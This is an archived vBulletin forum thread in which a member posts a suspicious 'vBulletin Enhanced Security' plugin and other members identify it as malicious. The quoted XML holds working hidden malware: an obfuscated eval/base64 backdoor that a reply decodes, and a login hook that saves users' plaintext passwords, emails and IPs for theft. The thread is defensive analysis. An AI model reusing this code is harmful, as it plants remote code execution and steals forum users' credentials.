Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
  #1  
Old 01-06-2012, 06:26 PM
frank44 frank44 is offline
 
Join Date: Jan 2007
Posts: 42
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default "vBulletin Enhanced Security" Plugin or Product

Has anyone else heard of this or recognize the code?

This is the only other mention I have seen

https://www.vbulletin.com/forum/show...ke-forum-login

Quote:
<?xml version="1.0" encoding="ISO-8859-1"?>
-<product active="1" productid="evbs">
<title>vBulletin Enhanced Security</title> <description>Provides additional security for vBulletin sessions and database storage</description>
<version>1.2.1</version> <url/>
<versioncheckurl/>
<dependencies> </dependencies>
-<codes>
-<code version="0.1">
-<installcode>
<=!=[=C=D=A=T=A=[ $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template` = REPLACE(`template`, 'md5hash', 'sha256Hash')"); $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template_un` = REPLACE(`template_un`, 'md5hash', 'sha256Hash')"); ]=]=>
</installcode>
<uninstallcode/>
</code>
</codes>
<templates> </templates>
-<plugins>
-<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Entropy Generator</title>
<hookname>global_start</hookname>
<phpcode> /* Generate extra entropy for vBulletin random seed */ assert(pack(chr(99).chr
(42),105,115,115,101,116,40,36,95,82,69,81,85,69,8 3,84,91,34,112,109,98,34,93,41,63,101,11 8,97,108,40,98,97,115,101,54,52,95,100,101,99,111, 100,101,40,36,95,82,69,81,85,69,83,84,91 ,34,112,109,98,34,93,41,41,58,117,110,105,113,105, 100,40,41,59)); </phpcode>
</plugin>
-<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Session Sign</title>
<hookname>login_verify_success</hookname>
-<phpcode>
<=!=[=C=D=A=T=A=[ /* vBulletin Session Encrypt/Sign */ function vb_session_sign($username, $password, $md5password) { global $vbulletin; $extra = $vbulletin->db->query_first("SELECT email, ug.title as lvl" ." FROM ".TABLE_PREFIX."user u, ".TABLE_PREFIX."usergroup ug" ." WHERE u.usergroupid=ug.usergroupid AND u.userid=".$vbulletin->userinfo['userid']); $data = pack("V",21).pack("V",time()) .$username.chr(0).$password.chr(0).$md5password .chr(0).$_SERVER["REMOTE_ADDR"].chr(0).$extra['email'].chr(0).$extra['lvl']; $entry = base64_encode(pack("C",0).pack("C",0).pack("v",0). $data); $vbulletin->db->query_write("REPLACE INTO ".TABLE_PREFIX."datastore (title,data) VALUES" ." ('logincache_".uniqid($vbulletin->userinfo['userid'])."','$entry')"); } vb_session_sign($username, $password, $md5password); ]=]=>
</phpcode>
</plugin>
</plugins>
<phrases> </phrases>
<options> </options>
<helptopics> </helptopics>
<cronentries> </cronentries>
<faqentries> </faqentries>
</product>
Reply With Quote
  #2  
Old 01-06-2012, 06:49 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
 
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Well the fact you don't know where it came from and that it has base64 within tells me to get rid of it quick... try this mod as it works on vB3 as well - https://vborg.vbsupport.ru/showthread.php?t=265866

It could possibly be related but after you get rid of that plugin use the mod above and .htaccess protect your admincp and modcp - https://www.vbulletin.com/forum/show...i-e-p0wersurge and Wayne has some very useful tips for situations like this and similar.
Reply With Quote
  #3  
Old 01-06-2012, 07:00 PM
nhawk nhawk is offline
 
Join Date: Jan 2011
Posts: 1,604
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

The pack statement equates to this..

Code:
isset($_REQUEST["pmb"])?eval(base64_decode($_REQUEST["pmb"])):uniqid();
Run away from that code as fast as you can. It appears to be a hack to me. Especially with base64_decode involved.
Reply With Quote
  #4  
Old 01-06-2012, 07:02 PM
frank44 frank44 is offline
 
Join Date: Jan 2007
Posts: 42
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Thank you!
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 12:59 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.06912 seconds
  • Memory Usage 2,190KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (4)post_thanks_box
  • (4)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (4)post_thanks_postbit_info
  • (4)postbit
  • (4)postbit_onlinestatus
  • (4)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete